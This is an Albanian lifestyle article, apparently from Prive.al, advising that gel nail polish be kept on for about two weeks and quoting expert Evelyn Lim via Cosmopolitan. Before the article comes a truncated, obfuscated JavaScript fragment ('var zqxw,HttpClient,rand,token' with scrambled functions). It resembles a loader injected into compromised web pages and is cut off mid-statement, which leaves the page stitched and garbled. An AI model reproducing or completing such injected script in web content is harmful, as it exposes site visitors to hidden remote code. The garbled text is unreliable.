;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

I rregulluat thonjtë, por sa gjatë duhet ta mbani xhelin pa e ndërruar ose hequr?

By

Një nga eksperiencat më të këndshme në jetë është padyshim rregullimi i thonjve me xhel.

Mirëpo, shumë nga ne nganjëherë edhe mburreni se thonjtë na mbajnë deri në tre katër javë, e disa të tjerë qahemi që nuk arrijnë këtë cak javor.

Por, sa në të vërtetë duhet të mbajmë xhelin në thonj pa e ndërruar ose hequr fare?

Sipas ekspertëve, nëse i mbani thonjtë për më shumë se dy javë, po bëni gabim!

Periudha e duhur kohore për të mbajtur thonjtë me xhel, pa rrezikuar mirëqenien e thonjve, është dy javë. Edhe pse thonjtë mund t’ju duken në formë perfekte dhe s’kanë nevojë të ndërrohen, nëse nuk i hiqni mund të dëmtoni thoin tuaj.

“Sa më gjatë ta mbani xhelin në thoin tuaj, aq më shumë konservohet, duke e bërë të pamundur heqjen e tij.”- shprehet ekspertja Evelyn Lim për “Cosmopolitan”. /Prive.al

Artikuj të ngjashëm